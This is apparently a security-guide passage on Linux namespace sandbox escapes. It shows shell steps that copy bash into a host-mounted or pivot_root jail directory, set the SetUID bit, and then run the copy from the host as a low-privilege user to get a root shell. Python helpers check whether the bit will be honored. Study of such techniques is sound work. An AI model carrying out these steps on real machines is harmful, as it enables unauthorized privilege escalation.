One dangerous feature of namespaces is the ability to mount parts of the host filesystem into the sandboxed environment. If you can read/write as a high-privilege user in the sandbox, you can do the same on the mount. This is most interesting when you have access to a low-privilege user on the host machine and a high-privilege user inside the sandbox: combining the two may give you high privileges on the host machine.

Imagine the host directory /tmp/data is mounted at /data inside the sandbox. If you can write there, you can create a SetUID binary as the high-privilege user and then run it as the low-privilege user on the host machine:

$ ./program    # Enter sandbox
# cp /bin/bash /data/bash  # Create a shell binary through mount on the host
# chmod +s /data/bash      # Set SetUID permissions on the shell binary
# # === using shellcode ===
# chmod("/data/bash", 06777)

# # Back on the host machine
$ /tmp/data/bash -p        # Execute the created SUID shell
bash-5.0#
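Before relying on the copied shell, you can check from the host whether the kernel will honor its SetUID bit. A Python sketch (hypothetical helper name): the file must be owned by root with the SetUID bit set, which is not the case if a user namespace maps the sandbox's root to an unprivileged host user, and the filesystem must not be mounted with nosuid, which makes the kernel ignore the bit.

```python
import os
import stat


def suid_root_usable(path: str) -> bool:
    """True if `path` is a root-owned SetUID file on a mount without nosuid."""
    st = os.stat(path)
    suid_root = st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)
    nosuid = bool(os.statvfs(path).f_flag & os.ST_NOSUID)
    return suid_root and not nosuid


# e.g. suid_root_usable("/tmp/data/bash") on the host after the steps above
```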

Even when no directory is explicitly mounted, you may be able to write a SetUID shell and reach it on the host through the jail directory. Similarly to chroot, namespaces can use pivot_root to make another directory the new /, but that directory still exists on the host filesystem. If you can make it accessible to the low-privilege host user, that user can run the SetUID shell from there:

$ ./program    # Enter sandbox
# cp /bin/bash bash  # Create shell binary
# chmod +s bash      # Set SetUID permissions as root
# chmod 777 .        # Allow low-privilege host user to access the jail directory 

# # Back on the host machine
$ /tmp/jail/bash -p        # Execute the created SUID shell
bash-5.0#
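Making the jail directory itself world-accessible (chmod 777 .) only helps if the host user can also traverse every directory above it. A rough Python sketch of that check (hypothetical helper name), assuming the host user is neither owner nor group member of those directories, so only the "others" execute bit counts; it ignores ACLs and security modules:

```python
import os
import stat


def reachable_by_others(path: str) -> bool:
    """True if every directory from / down to `path` has the 'others' execute bit."""
    path = os.path.abspath(path)
    prefixes = ["/"]
    for part in path.split("/"):
        if part:
            prefixes.append(os.path.join(prefixes[-1], part))
    for prefix in prefixes:
        mode = os.stat(prefix).st_mode
        # Directories need o+x to be traversed; a file at the end is skipped
        if stat.S_ISDIR(mode) and not mode & stat.S_IXOTH:
            return False
    return True


# e.g. reachable_by_others("/tmp/jail/bash") before trying the SUID shell
```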
